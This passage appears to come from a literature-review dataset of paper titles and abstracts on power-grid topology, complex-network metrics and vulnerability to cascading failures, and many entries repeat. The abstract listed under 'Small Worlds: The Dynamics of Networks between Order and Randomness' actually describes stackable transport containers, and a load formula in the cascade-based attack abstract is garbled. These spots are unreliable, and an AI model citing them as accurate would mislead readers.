identifying the important topological parameters to work on to facilitate such open decentralized markets. --- paper_title: Power Grids as Complex Networks: Topology and Fragility paper_content: We almost certainly agree that the harnessing of electricity can be considered the most important technological advance of the twentieth century. The development that allows this control is the power grid, an intricate system composed of generators, substations and transformers connected by cable lines hundreds of kilometers long. Its presence is nowadays so intertwined with ours, and so much taken for granted, that we are only capable of sensing its absence, disguised as a cascading failure or a blackout in its extreme form. Since these extreme phenomena seem to have increased in recent years and new actors, like highly liberalized markets or environmental and social constraints, are taking a leading role, different paths other than traditional engineering ones have been explored. In the last ten years, and mainly due to increasing computational capability and accessibility to data, the conceptual frame of complex networks has allowed different approaches in order to understand the usual (and not-so-usual) outcomes of this system. This paper considers power grids as complex networks. It presents some recent results that correlate their topology with their fragility, together with major malfunctions analysis, and for the European transmission power grid in particular. --- paper_title: A Centrality Measure for Electrical Networks paper_content: We derive a measure of "electrical centrality" for AC power networks, which describes the structure of the network as a function of its electrical topology rather than its physical topology. We compare our centrality measure to conventional measures of network structure using the IEEE 300-bus network. We find that when measured electrically, power networks appear to have a scale-free network structure. Thus, unlike previous studies of the structure of power grids, we find that power networks have a number of highly-connected "hub" buses. This result, and the structure of power networks in general, is likely to have important implications for the reliability and security of power networks. --- paper_title: Identifying vulnerable lines in a power network using complex network theory paper_content: The latest developments in complex network theory have provided a new direction to power system research. Based on this theory a power system can be modelled as a graph with nodes and vertices and further analysis can help in identifying the important lines. This paper proposes a new betweenness index using the reactance of the transmission lines as the weight and criteria to measure of vulnerability of a power network. The reactance is a simplified measure of power flow in a lossless transmission line based on the power flow analysis equations. The weighted line index is defined as the reactance of the electric path taken to reach from one node to another node. More power is transmitted along the lines with less reactance, to reach from the source node to destination node, which gives the edges with less reactance a higher weight in the analysis. The analyzes have been carried out on the IEEE 39 bus system and IEEE 118 Bus System. The new betweenness index can identify the critical lines of the system, either due to their position in the network or by the power they transmit along the network. --- paper_title: The Improvement of the Small-world Network Model and Its Application Research in Bulk Power System paper_content: Due to the complexity of cascading failures and blackouts, the small world theory for complex network research is employed in probing the mechanism of them. In the paper, the original small world network model has been modified in two ways. Firstly, the magnitude of the line impedance regarded as the weight of edges is taken into consideration which is not considered in the original model. The formulae of corresponding parameters of the model are also modified. The calculation results of some practical grids validate the correctness and effectiveness of the new model. Secondly, the complex number format of power flow is introduced as the network flow in the small world model. With the power flow and the topology of grids, the two main factors to the system vulnerability, considered, the improved small world model can be used as a tool for vulnerability analysis of grids. --- paper_title: Topological analysis of eastern region of Indian power grid paper_content: The modern power grid is tending towards more complexity as power has become an integral part of life even in remote location. Thus the vulnerability of such grids has become more prominent; necessitating some simulation based modeling to extract some important features for such sprawling network. The spatial structure of the power grid has been used for topological analysis of the power grid. The case studies pertaining to eastern region power grid of India validate such approach. --- paper_title: Analysis of structural vulnerabilities in power transmission grids paper_content: Abstract Power transmission grids play a crucial role as a critical infrastructure by assuring the proper functioning of power systems. In particular, they secure the loads supplied by power generation plants and help avoid blackouts that can have a disastrous impact on society. The power grid structure (number of nodes and lines, their connections, and their physical properties and operational constraints) is one of the key issues (along with generation availability) to assure power system security; consequently, it deserves special attention. A promising approach for the structural analysis of transmission grids with respect to their vulnerabilities is to use metrics and approaches derived from complex network (CN) theory that are shared with other infrastructures such as the World-Wide Web, telecommunication networks, and oil and gas pipelines. These approaches, based on metrics such as global efficiency, degree and betweenness, are purely topological because they study structural vulnerabilities based on the graphical representation of a network as a set of vertices connected by a set of edges. Unfortunately, these approaches fail to capture the physical properties and operational constraints of power systems and, therefore, cannot provide meaningful analyses. This paper proposes an extended topological approach that includes the definitions of traditional topological metrics (e.g., degrees of nodes and global efficiency) as well as the physical/operational behavior of power grids in terms of real power-flow allocation over lines and line flow limits. This approach provides two new metrics, entropic degree and net-ability, that can be used to assess structural vulnerabilities in power systems. The new metrics are applied to test systems as well as real power grids to demonstrate their performance and to contrast them with traditional, purely topological metrics. --- paper_title: The Concept of Betweenness in the Analysis of Power Grid Vulnerability paper_content: Vulnerability analysis in power systems is a key issue in modern society and many efforts have contributed to the analysis. Recently, complex network metrics applied to assess the topological vulnerability of networked systems have been used in power systems, such as betweenness metric, since transmission of power systems is in basis of a network structure. However, a pure topological approach fails to capture the specificity of power systems. This paper redefines, starting from the concept of complex networks, an electrical betweenness metric which considers several of specific features of power systems such as power transfer distribution and line flow limits. The electrical betweenness is compared with the conventional betweenness in IEEE-300 bus network according to the un-served energy after network is attacked. The results show that the tested network is more vulnerable when the components of the network are attacked according to their criticalities ranked by electrical betweenness. --- paper_title: Analyzing power network vulnerability with maximum flow based centrality approach paper_content: Complex network theory has been studied extensively in solving large scale practical problems and the recent developments have given a new direction to power system research. This theory allows modeling a power system as a network and the latest developments incorporate more and more electrical properties as opposed to the topological analysis in the past. In the past, such networks have been analyzed based on shortest path travel and betweenness index. In a power system, the power might not necessarily flow only through the shortest path so this paper proposes a centrality index based on the maximum power flow through the edges. The links which carry more portion of power from the source (generator) to sink (load) are given a higher weight in this analysis. Few simple cases have been explained and then the algorithm has been demonstrated on the IEEE 39 bus system. --- paper_title: TOPOLOGY AND CASCADING LINE OUTAGES IN POWER GRIDS paper_content: Motivated by the small world network research of Watts & Strogatz, this paper studies relationships between topology and cascading line outages in electric power grids. Cascading line outages are a type of cascading collapse that can occur in power grids when the transmission network is congested. It is characterized by a self-sustaining sequence of line outages followed by grid breakup, which generally leads to widespread blackout. The main findings of this work are twofold: On one hand, the work suggests that topologies with more disorder in their interconnection topology tend to be robust with respect to cascading line outages in the sense of being able to support greater generation and demand levels than more regularly interconnected topologies. On the other hand, the work suggests that topologies with more disorder tend to be more fragile in that should a cascade get started, they tend to break apart after fewer outages than more regularly interconnected topologies. Thus, as has been observed in other complex networks, there appears to be a tradeoff between robustness and fragility. These results were established using synthetically generated power grid topologies and verified using the IEEE 57 bus and 188 bus power grid test cases. --- paper_title: Generating Statistically Correct Random Topologies for Testing Smart Grid Communication and Control Networks paper_content: In order to design an efficient communication scheme and examine the efficiency of any networked control architecture in smart grid applications, we need to characterize statistically its information source, namely the power grid itself. Investigating the statistical properties of power grids has the immediate benefit of providing a natural simulation platform, producing a large number of power grid test cases with realistic topologies, with scalable network size, and with realistic electrical parameter settings. The second benefit is that one can start analyzing the performance of decentralized control algorithms over information networks whose topology matches that of the underlying power network and use network scientific approaches to determine analytically if these architectures would scale well. With these motivations, in this paper we study both the topological and electrical characteristics of power grid networks based on a number of synthetic and real-world power systems. The most interesting discoveries include: the power grid is sparsely connected with obvious small-world properties; its nodal degree distribution can be well fitted by a mixture distribution coming from the sum of a truncated geometric random variable and an irregular discrete random variable; the power grid has very distinctive graph spectral density and its algebraic connectivity scales as a power function of the network size; the line impedance has a heavy-tailed distribution, which can be captured quite accurately by a clipped double Pareto lognormal distribution. Based on the discoveries mentioned above, we propose an algorithm that generates random topology power grids featuring the same topology and electrical characteristics found from the real data. --- paper_title: Complex Networks Theory: A New Method of Research in Power Grid paper_content: The rapid development of complex network theory provide a new insight into the research of interconnected complex power grid. On the basis of mapping the power grid into a network graph, the topological parameters, such as degree distribution, characteristic path length, clustering coefficient etc, are introduced to describe the network structure characters. And the statistical results of these parameters in power grids of China and America are shown and analyzed. Then, small-world model are explained and simulated to the power grid. In order to measure the performance of the power grid globally and locally, the concept efficiency and its application is also introduced. The mechanism and the model of cascading failure in power grid are successively discussed. Finally, some possible directions of future research are proposed at the end of the paper --- paper_title: Small Worlds: The Dynamics of Networks between Order and Randomness. paper_content: Transport brackets are affixed to the container and include provisions for achieving transportability with either a crane or a fork lift. Variable storage capacity is provided by an extension bin which is detachably affixed as part of the container. The top and bottom of the container are compatibly configured to provide an interlock between a plurality of stacked containers and a dolly is configured for use with these interlocking provisions. The container is configured to achieve stacking interchangeability when any vertically peripheral sides are aligned and brackets are disposed around the vertical periphery of the container to achieve fork lift accessibility from any direction perpendicular to the vertically peripheral sides. --- paper_title: An Experimental Study of the Small World Problem paper_content: Arbitrarily selected individuals (N=296) in Nebraska and Boston are asked to generate acquaintance chains to a target person in Massachusetts, employing “the small world method” (Milgram, 1967). Sixty-four chains reach the target person. Within this group the mean number of intermediaries between starters and targets is 5.2. Boston starting chains reach the target person with fewer intermediaries than those starting in Nebraska; subpopulations in the Nebraska group do not differ among themselves. The funneling of chains through sociometric “stars” is noted, with 48 per cent of the chains passing through three persons before reaching the target. Applications of the method to studies of large scale social structure are discussed. --- paper_title: Towards Decentralization: A Topological Investigation of the Medium and Low Voltage Grids paper_content: The traditional power grid has been designed in a hierarchical fashion, with energy pushed from the large scale production factories towards the end users. With the increasing availability of micro and medium scale generating facilities, the situation is changing. Many end users can now produce energy and share it over the power grid. Of course, end users need incentives to do so and want to act in an open decentralized energy market. In the present work, we offer a novel analysis of the medium and low voltage power grids of the North Netherlands using statistical tools from the complex network analysis field. We use a weighted model based on actual grid data and propose a set of statistical measures to evaluate the adequacy of the current infrastructure for a decentralized energy market. Further, we use the insight gained by the analysis to propose parameters that tie the statistical topological measures to economic factors that influence the attractiveness of participating in such decentralized energy market, thus identifying the important topological parameters to work on to facilitate such open decentralized markets. --- paper_title: The Improvement of the Small-world Network Model and Its Application Research in Bulk Power System paper_content: Due to the complexity of cascading failures and blackouts, the small world theory for complex network research is employed in probing the mechanism of them. In the paper, the original small world network model has been modified in two ways. Firstly, the magnitude of the line impedance regarded as the weight of edges is taken into consideration which is not considered in the original model. The formulae of corresponding parameters of the model are also modified. The calculation results of some practical grids validate the correctness and effectiveness of the new model. Secondly, the complex number format of power flow is introduced as the network flow in the small world model. With the power flow and the topology of grids, the two main factors to the system vulnerability, considered, the improved small world model can be used as a tool for vulnerability analysis of grids. --- paper_title: Collective dynamics of ‘small-world’ networks paper_content: Networks of coupled dynamical systems have been used to model biological oscillators1,2,3,4, Josephson junction arrays5,6, excitable media7, neural networks8,9,10, spatial games11, genetic control networks12 and many other self-organizing systems. Ordinarily, the connection topology is assumed to be either completely regular or completely random. But many biological, technological and social networks lie somewhere between these two extremes. Here we explore simple models of networks that can be tuned through this middle ground: regular networks ‘rewired’ to introduce increasing amounts of disorder. We find that these systems can be highly clustered, like regular lattices, yet have small characteristic path lengths, like random graphs. We call them ‘small-world’ networks, by analogy with the small-world phenomenon13,14 (popularly known as six degrees of separation15). The neural network of the worm Caenorhabditis elegans, the power grid of the western United States, and the collaboration graph of film actors are shown to be small-world networks. Models of dynamical systems with small-world coupling display enhanced signal-propagation speed, computational power, and synchronizability. In particular, infectious diseases spread more easily in small-world networks than in regular lattices. --- paper_title: Exploring complex networks paper_content: The study of networks pervades all of science, from neurobiology to statistical physics. The most basic issues are structural: how does one characterize the wiring diagram of a food web or the Internet or the metabolic network of the bacterium Escherichia coli? Are there any unifying principles underlying their topology? From the perspective of nonlinear dynamics, we would also like to understand how an enormous network of interacting dynamical systems — be they neurons, power stations or lasers — will behave collectively, given their individual dynamics and coupling architecture. Researchers are only now beginning to unravel the structure and dynamics of complex networks. --- paper_title: TOPOLOGICAL VULNERABILITY OF THE EUROPEAN POWER GRID UNDER ERRORS AND ATTACKS paper_content: We present an analysis of the topological structure and static tolerance to errors and attacks of the September 2003 actualization of the Union for the Coordination of Transport of Electricity (UCTE) power grid, involving thirty-three different networks. Though every power grid studied has exponential degree distribution and most of them lack typical small-world topology, they display patterns of reaction to node loss similar to those observed in scale-free networks. We have found that the node removal behavior can be logarithmically related to the power grid size. This logarithmic behavior would suggest that, though size favors fragility, growth can reduce it. We conclude that, with the ever-growing demand for power and reliability, actual planning strategies to increase transmission systems would have to take into account this relative increase in vulnerability with size, in order to facilitate and improve the power grid design and functioning. --- paper_title: TOPOLOGY AND CASCADING LINE OUTAGES IN POWER GRIDS paper_content: Motivated by the small world network research of Watts & Strogatz, this paper studies relationships between topology and cascading line outages in electric power grids. Cascading line outages are a type of cascading collapse that can occur in power grids when the transmission network is congested. It is characterized by a self-sustaining sequence of line outages followed by grid breakup, which generally leads to widespread blackout. The main findings of this work are twofold: On one hand, the work suggests that topologies with more disorder in their interconnection topology tend to be robust with respect to cascading line outages in the sense of being able to support greater generation and demand levels than more regularly interconnected topologies. On the other hand, the work suggests that topologies with more disorder tend to be more fragile in that should a cascade get started, they tend to break apart after fewer outages than more regularly interconnected topologies. Thus, as has been observed in other complex networks, there appears to be a tradeoff between robustness and fragility. These results were established using synthetically generated power grid topologies and verified using the IEEE 57 bus and 188 bus power grid test cases. --- paper_title: Vulnerability Assessment of Power Grid Using Graph Topological Indices paper_content: This paper presents an assessment of the vulnerability of the power grid to blackout using graph topological indexes. Based on a FERC 715 report and the outage reports, the cascading faults of summer WSCC 1996 are reconstructed, and the graphical property of the grid is compared between two cases: when the blackout triggering lines are removed simulating the actual sequence of cascading outages and when the same number of randomly selected lines are removed. The investigation finds that the critical path lengths of the triggering events of the July and August outages of 1996 WSCC blackout are higher than those of no-outage and arbitrary events. In addition, the small world-ness index for each of the outage triggering events is much smaller than that of normal or any no-outage scenario, indicating that events of shifting a network from small world to a random network would be more likely cascaded to wide area outage. --- paper_title: Using Graph Models to Analyze the Vulnerability of Electric Power Networks paper_content: In this article, we model electric power delivery networks as graphs, and conduct studies of two power transmission grids, i.e., the Nordic and the western states (U.S.) transmission grid. We calculate values of topological (structural) characteristics of the networks and compare their error and attack tolerance (structural vulnerability), i.e., their performance when vertices are removed, with two frequently used theoretical reference networks (the Erdos-Renyi random graph and the Barabasi-Albert scale-free network). Further, we perform a structural vulnerability analysis of a fictitious electric power network with simple structure. In this analysis, different strategies to decrease the vulnerability of the system are evaluated. Finally, we present a discussion on the practical applicability of graph modeling. --- paper_title: Generating Statistically Correct Random Topologies for Testing Smart Grid Communication and Control Networks paper_content: In order to design an efficient communication scheme and examine the efficiency of any networked control architecture in smart grid applications, we need to characterize statistically its information source, namely the power grid itself. Investigating the statistical properties of power grids has the immediate benefit of providing a natural simulation platform, producing a large number of power grid test cases with realistic topologies, with scalable network size, and with realistic electrical parameter settings. The second benefit is that one can start analyzing the performance of decentralized control algorithms over information networks whose topology matches that of the underlying power network and use network scientific approaches to determine analytically if these architectures would scale well. With these motivations, in this paper we study both the topological and electrical characteristics of power grid networks based on a number of synthetic and real-world power systems. The most interesting discoveries include: the power grid is sparsely connected with obvious small-world properties; its nodal degree distribution can be well fitted by a mixture distribution coming from the sum of a truncated geometric random variable and an irregular discrete random variable; the power grid has very distinctive graph spectral density and its algebraic connectivity scales as a power function of the network size; the line impedance has a heavy-tailed distribution, which can be captured quite accurately by a clipped double Pareto lognormal distribution. Based on the discoveries mentioned above, we propose an algorithm that generates random topology power grids featuring the same topology and electrical characteristics found from the real data. --- paper_title: A topological analysis of the Italian electric power grid paper_content: Large-scale blackouts are an intrinsic drawback of electric power transmission grids. Here we analyze the structural vulnerability of the Italian GRTN power grid by using a model for cascading failures recently proposed in Crucitti et al. (Phys. Rev. E 69 (2004)). --- paper_title: Complex Networks Theory: A New Method of Research in Power Grid paper_content: The rapid development of complex network theory provide a new insight into the research of interconnected complex power grid. On the basis of mapping the power grid into a network graph, the topological parameters, such as degree distribution, characteristic path length, clustering coefficient etc, are introduced to describe the network structure characters. And the statistical results of these parameters in power grids of China and America are shown and analyzed. Then, small-world model are explained and simulated to the power grid. In order to measure the performance of the power grid globally and locally, the concept efficiency and its application is also introduced. The mechanism and the model of cascading failure in power grid are successively discussed. Finally, some possible directions of future research are proposed at the end of the paper --- paper_title: Evaluating North American Electric Grid Reliability Using the Barabasi-Albert Network Model paper_content: The reliability of electric transmission systems is examined using a scale-free model of network topology and failure propagation. The topologies of the North American eastern and western electric grids are analyzed to estimate their reliability based on the Barabasi–Albert network model. A commonly used power system reliability index is computed using a simple failure propagation model. The results are compared to the values of power system reliability indices previously obtained using standard power engineering methods, and they suggest that scale-free network models are usable to estimate aggregate electric grid reliability. --- paper_title: Structural vulnerability of the North American power grid paper_content: The magnitude of the August 2003 blackout affecting the United States has put the challenges of energy transmission and distribution into limelight. Despite all the interest and concerted effort, the complexity and interconnectivity of the electric infrastructure precluded us for a long time from understanding why certain events happened. In this paper we study the power grid from a network perspective and determine its ability to transfer power between generators and consumers when certain nodes are disrupted. We find that the power grid is robust to most perturbations, yet disturbances affecting key transmision substations greatly reduce its ability to function. We emphasize that the global properties of the underlying network must be understood as they greatly affect local behavior. --- paper_title: Electrical centrality measures for electric power grid vulnerability analysis paper_content: Centrality measures are used in network science to rank the relative importance of nodes and edges of a graph. Here we define new measures of centrality for power grid structure that are based on its functionality. We show that the relative importance analysis based on centrality in graph theory can be generalized to power grid network with its electrical parameters taken into account. In the paper we experiment with the proposed electrical centrality measures on the NYISO-2935 system and the IEEE 300-bus system. We analyze the centrality distribution in order to identify important nodes or branches in the system which are of essential importance in terms of system vulnerability. We also present and discuss a number of interesting discoveries regarding the importance rank of power grid nodes and branches. --- paper_title: Assessing European power grid reliability by means of topological measures paper_content: Publicat originalment a: WIT transactions on ecology and the environment, 2009, vol. 121, p. 527-537 --- paper_title: Towards Decentralization: A Topological Investigation of the Medium and Low Voltage Grids paper_content: The traditional power grid has been designed in a hierarchical fashion, with energy pushed from the large scale production factories towards the end users. With the increasing availability of micro and medium scale generating facilities, the situation is changing. Many end users can now produce energy and share it over the power grid. Of course, end users need incentives to do so and want to act in an open decentralized energy market. In the present work, we offer a novel analysis of the medium and low voltage power grids of the North Netherlands using statistical tools from the complex network analysis field. We use a weighted model based on actual grid data and propose a set of statistical measures to evaluate the adequacy of the current infrastructure for a decentralized energy market. Further, we use the insight gained by the analysis to propose parameters that tie the statistical topological measures to economic factors that influence the attractiveness of participating in such decentralized energy market, thus identifying the important topological parameters to work on to facilitate such open decentralized markets. --- paper_title: The Node Degree Distribution in Power Grid and Its Topology Robustness under Random and Selective Node Removals paper_content: In this paper we numerically study the topology robustness of power grids under random and selective node breakdowns, and analytically estimate the critical node-removal thresholds to disintegrate a system, based on the available US power grid data. We also present an analysis on the node degree distribution in power grids because it closely relates with the topology robustness. It is found that the node degree in a power grid can be well fitted by a mixture distribution coming from the sum of a truncated Geometric random variable and an irregular Discrete random variable. With the findings we obtain better estimates of the threshold under selective node breakdowns which predict the numerical thresholds more correctly. --- paper_title: A Centrality Measure for Electrical Networks paper_content: We derive a measure of "electrical centrality" for AC power networks, which describes the structure of the network as a function of its electrical topology rather than its physical topology. We compare our centrality measure to conventional measures of network structure using the IEEE 300-bus network. We find that when measured electrically, power networks appear to have a scale-free network structure. Thus, unlike previous studies of the structure of power grids, we find that power networks have a number of highly-connected "hub" buses. This result, and the structure of power networks in general, is likely to have important implications for the reliability and security of power networks. --- paper_title: Topological properties of high-voltage electrical transmission networks paper_content: The topological properties of high-voltage electrical power transmission networks in several UE countries (the Italian 380 kV, the French 400 kV and the Spanish 400 kV networks) have been studied from available data. An assessment of the vulnerability of the networks has been given by measuring the level of damage introduced by a controlled removal of links. Topological studies could be useful to make vulnerability assessment and to design specific action to reduce topological weaknesses. --- paper_title: Collective dynamics of ‘small-world’ networks paper_content: Networks of coupled dynamical systems have been used to model biological oscillators1,2,3,4, Josephson junction arrays5,6, excitable media7, neural networks8,9,10, spatial games11, genetic control networks12 and many other self-organizing systems. Ordinarily, the connection topology is assumed to be either completely regular or completely random. But many biological, technological and social networks lie somewhere between these two extremes. Here we explore simple models of networks that can be tuned through this middle ground: regular networks ‘rewired’ to introduce increasing amounts of disorder. We find that these systems can be highly clustered, like regular lattices, yet have small characteristic path lengths, like random graphs. We call them ‘small-world’ networks, by analogy with the small-world phenomenon13,14 (popularly known as six degrees of separation15). The neural network of the worm Caenorhabditis elegans, the power grid of the western United States, and the collaboration graph of film actors are shown to be small-world networks. Models of dynamical systems with small-world coupling display enhanced signal-propagation speed, computational power, and synchronizability. In particular, infectious diseases spread more easily in small-world networks than in regular lattices. --- paper_title: TOPOLOGICAL VULNERABILITY OF THE EUROPEAN POWER GRID UNDER ERRORS AND ATTACKS paper_content: We present an analysis of the topological structure and static tolerance to errors and attacks of the September 2003 actualization of the Union for the Coordination of Transport of Electricity (UCTE) power grid, involving thirty-three different networks. Though every power grid studied has exponential degree distribution and most of them lack typical small-world topology, they display patterns of reaction to node loss similar to those observed in scale-free networks. We have found that the node removal behavior can be logarithmically related to the power grid size. This logarithmic behavior would suggest that, though size favors fragility, growth can reduce it. We conclude that, with the ever-growing demand for power and reliability, actual planning strategies to increase transmission systems would have to take into account this relative increase in vulnerability with size, in order to facilitate and improve the power grid design and functioning. --- paper_title: Using Graph Models to Analyze the Vulnerability of Electric Power Networks paper_content: In this article, we model electric power delivery networks as graphs, and conduct studies of two power transmission grids, i.e., the Nordic and the western states (U.S.) transmission grid. We calculate values of topological (structural) characteristics of the networks and compare their error and attack tolerance (structural vulnerability), i.e., their performance when vertices are removed, with two frequently used theoretical reference networks (the Erdos-Renyi random graph and the Barabasi-Albert scale-free network). Further, we perform a structural vulnerability analysis of a fictitious electric power network with simple structure. In this analysis, different strategies to decrease the vulnerability of the system are evaluated. Finally, we present a discussion on the practical applicability of graph modeling. --- paper_title: A topological analysis of the Italian electric power grid paper_content: Large-scale blackouts are an intrinsic drawback of electric power transmission grids. Here we analyze the structural vulnerability of the Italian GRTN power grid by using a model for cascading failures recently proposed in Crucitti et al. (Phys. Rev. E 69 (2004)). --- paper_title: Structural vulnerability of the North American power grid paper_content: The magnitude of the August 2003 blackout affecting the United States has put the challenges of energy transmission and distribution into limelight. Despite all the interest and concerted effort, the complexity and interconnectivity of the electric infrastructure precluded us for a long time from understanding why certain events happened. In this paper we study the power grid from a network perspective and determine its ability to transfer power between generators and consumers when certain nodes are disrupted. We find that the power grid is robust to most perturbations, yet disturbances affecting key transmision substations greatly reduce its ability to function. We emphasize that the global properties of the underlying network must be understood as they greatly affect local behavior. --- paper_title: Electrical centrality measures for electric power grid vulnerability analysis paper_content: Centrality measures are used in network science to rank the relative importance of nodes and edges of a graph. Here we define new measures of centrality for power grid structure that are based on its functionality. We show that the relative importance analysis based on centrality in graph theory can be generalized to power grid network with its electrical parameters taken into account. In the paper we experiment with the proposed electrical centrality measures on the NYISO-2935 system and the IEEE 300-bus system. We analyze the centrality distribution in order to identify important nodes or branches in the system which are of essential importance in terms of system vulnerability. We also present and discuss a number of interesting discoveries regarding the importance rank of power grid nodes and branches. --- paper_title: Towards Decentralization: A Topological Investigation of the Medium and Low Voltage Grids paper_content: The traditional power grid has been designed in a hierarchical fashion, with energy pushed from the large scale production factories towards the end users. With the increasing availability of micro and medium scale generating facilities, the situation is changing. Many end users can now produce energy and share it over the power grid. Of course, end users need incentives to do so and want to act in an open decentralized energy market. In the present work, we offer a novel analysis of the medium and low voltage power grids of the North Netherlands using statistical tools from the complex network analysis field. We use a weighted model based on actual grid data and propose a set of statistical measures to evaluate the adequacy of the current infrastructure for a decentralized energy market. Further, we use the insight gained by the analysis to propose parameters that tie the statistical topological measures to economic factors that influence the attractiveness of participating in such decentralized energy market, thus identifying the important topological parameters to work on to facilitate such open decentralized markets. --- paper_title: Do topological models provide good information about electricity infrastructure vulnerability paper_content: In order to identify the extent to which results from topological graph models are useful for modeling vulnerability in electricity infrastructure, we measure the susceptibility of power networks to random failures and directed attacks using three measures of vulnerability: characteristic path lengths, connectivity loss, and blackout sizes. The first two are purely topological metrics. The blackout size calculation results from a model of cascading failure in power networks. Testing the response of 40 areas within the Eastern U.S. power grid and a standard IEEE test case to a variety of attack/failure vectors indicates that directed attacks result in larger failures using all three vulnerability measures, but the attack-vectors that appear to cause the most damage depend on the measure chosen. While the topological metrics and the power grid model show some similar trends, the vulnerability metrics for individual simulations show only a mild correlation. We conclude that evaluating vulnerability in power ... --- paper_title: A topological analysis of the Italian electric power grid paper_content: Large-scale blackouts are an intrinsic drawback of electric power transmission grids. Here we analyze the structural vulnerability of the Italian GRTN power grid by using a model for cascading failures recently proposed in Crucitti et al. (Phys. Rev. E 69 (2004)). --- paper_title: Cascade-based attack vulnerability on the US power grid paper_content: The vulnerability of real-life networks subject to intentional attacks has been one of the outstanding challenges in the study of the network safety. Applying the real data of the US power grid, we compare the effects of two different attacks for the network robustness against cascading failures, i.e., removal by either the descending or ascending orders of the loads. Adopting the initial load of a node j to be Lj !" kj# Rm2Cj km$% a with kj and Cj being the degree of the node j and the set of its neighboring nodes, respectively, where a is a tunable parameter and governs the strength of the initial load of a node, we investigate the response of the US power grid under two attacks during the cascading propagation. In the case of a < 0:7, our investigation by the numerical simulations leads to a counterintuitive finding on the US power grid that the attack on the nodes with the lowest loads is more harmful than the attack on the ones with the highest loads. In addition, the almost same effect of two attacks in the case ofa ! 0:7 may be useful in furthering studies on the control and defense of cascading failures in the US power grid. --- paper_title: Evaluating North American Electric Grid Reliability Using the Barabasi-Albert Network Model paper_content: The reliability of electric transmission systems is examined using a scale-free model of network topology and failure propagation. The topologies of the North American eastern and western electric grids are analyzed to estimate their reliability based on the Barabasi–Albert network model. A commonly used power system reliability index is computed using a simple failure propagation model. The results are compared to the values of power system reliability indices previously obtained using standard power engineering methods, and they suggest that scale-free network models are usable to estimate aggregate electric grid reliability. --- paper_title: Vulnerability assessment of bulk power grid based on complex network theory paper_content: The vulnerability assessment algorithm of the bulk power grid based on complex network theory is proposed in this paper. The traditional research model of the power grid based on complex network theory is a graph with no direction and no weight at present. Because this model is far from the real power system, sometimes the wrong results may be gotten. In this paper, the models of components in the power grid are constructed detailedly, furthermore the weighted and directional graph is provided. First, the connecting formings among buses (instead in the traditional methods only substations are considered), lines, transformers and generators are simulated detailedly. Second, the power flow direction in the power grid is considered, and the components' tolerance to disturbances is also considered. Based on the proposed model, the power grid's tolerance to errors and attacks is analyzed. The key components and weak areas are indicated. At last, the robustness and fault dissemination mechanism of the power grid under cascading failures are analyzed based on the proposed method. The North China power grid is used as an example to validate the proposed method. --- paper_title: Suppressing cascades of load in interdependent networks paper_content: Understanding how interdependence among systems affects cascading behaviors is increasingly important across many fields of science and engineering. Inspired by cascades of load shedding in coupled electric grids and other infrastructure, we study the Bak–Tang–Wiesenfeld sandpile model on modular random graphs and on graphs based on actual, interdependent power grids. Starting from two isolated networks, adding some connectivity between them is beneficial, for it suppresses the largest cascades in each system. Too much interconnectivity, however, becomes detrimental for two reasons. First, interconnections open pathways for neighboring networks to inflict large cascades. Second, as in real infrastructure, new interconnections increase capacity and total possible load, which fuels even larger cascades. Using a multitype branching process and simulations we show these effects and estimate the optimal level of interconnectivity that balances their trade-offs. Such equilibria could allow, for example, power grid owners to minimize the largest cascades in their grid. We also show that asymmetric capacity among interdependent networks affects the optimal connectivity that each prefers and may lead to an arms race for greater capacity. Our multitype branching process framework provides building blocks for better prediction of cascading processes on modular random graphs and on multitype networks in general. --- paper_title: Modeling Cascading Failures in the North American Power Grid paper_content: The North American power grid is one of the most complex technological networks, and its interconnectivity allows both for long-distance power transmission and for the propagation of disturbances. We model the power grid using its actual topology and plausible assumptions about the load and overload of transmission substations. Our results indicate that the loss of a single substation can result in up to \(25\%\) loss of transmission efficiency by triggering an overload cascade in the network. The actual transmission loss depends on the overload tolerance of the network and the connectivity of the failed substation. We systematically study the damage inflicted by the loss of single nodes, and find three universal behaviors, suggesting that \(40\%\) of the transmission substations lead to cascading failures when disrupted. While the loss of a single node can inflict substantial damage, subsequent removals have only incremental effects, in agreement with the topological resilience to less than \(1\%\) node loss. --- paper_title: Robustness of the European power grids under intentional attack paper_content: The power grid defines one of the most important technological networks of our times and sustains our complex society. It has evolved for more than a century into an extremely huge and seemingly robust and well understood system. But it becomes extremely fragile as well, when unexpected, usually minimal, failures turn into unknown dynamical behaviours leading, for example, to sudden and massive blackouts. Here we explore the fragility of the European power grid under the effect of selective node removal. A mean field analysis of fragility against attacks is presented together with the observed patterns. Deviations from the theoretical conditions for network percolation (and fragmentation) under attacks are analysed and correlated with non topological reliability measures. --- paper_title: Structural vulnerability of the North American power grid paper_content: The magnitude of the August 2003 blackout affecting the United States has put the challenges of energy transmission and distribution into limelight. Despite all the interest and concerted effort, the complexity and interconnectivity of the electric infrastructure precluded us for a long time from understanding why certain events happened. In this paper we study the power grid from a network perspective and determine its ability to transfer power between generators and consumers when certain nodes are disrupted. We find that the power grid is robust to most perturbations, yet disturbances affecting key transmision substations greatly reduce its ability to function. We emphasize that the global properties of the underlying network must be understood as they greatly affect local behavior. --- paper_title: Assessing European power grid reliability by means of topological measures paper_content: Publicat originalment a: WIT transactions on ecology and the environment, 2009, vol. 121, p. 527-537 --- paper_title: Towards Decentralization: A Topological Investigation of the Medium and Low Voltage Grids paper_content: The traditional power grid has been designed in a hierarchical fashion, with energy pushed from the large scale production factories towards the end users. With the increasing availability of micro and medium scale generating facilities, the situation is changing. Many end users can now produce energy and share it over the power grid. Of course, end users need incentives to do so and want to act in an open decentralized energy market. In the present work, we offer a novel analysis of the medium and low voltage power grids of the North Netherlands using statistical tools from the complex network analysis field. We use a weighted model based on actual grid data and propose a set of statistical measures to evaluate the adequacy of the current infrastructure for a decentralized energy market. Further, we use the insight gained by the analysis to propose parameters that tie the statistical topological measures to economic factors that influence the attractiveness of participating in such decentralized energy market, thus identifying the important topological parameters to work on to facilitate such open decentralized markets. --- paper_title: The Node Degree Distribution in Power Grid and Its Topology Robustness under Random and Selective Node Removals paper_content: In this paper we numerically study the topology robustness of power grids under random and selective node breakdowns, and analytically estimate the critical node-removal thresholds to disintegrate a system, based on the available US power grid data. We also present an analysis on the node degree distribution in power grids because it closely relates with the topology robustness. It is found that the node degree in a power grid can be well fitted by a mixture distribution coming from the sum of a truncated Geometric random variable and an irregular Discrete random variable. With the findings we obtain better estimates of the threshold under selective node breakdowns which predict the numerical thresholds more correctly. --- paper_title: Power Grids as Complex Networks: Topology and Fragility paper_content: We almost certainly agree that the harnessing of electricity can be considered the most important technological advance of the twentieth century. The development that allows this control is the power grid, an intricate system composed of generators, substations and transformers connected by cable lines hundreds of kilometers 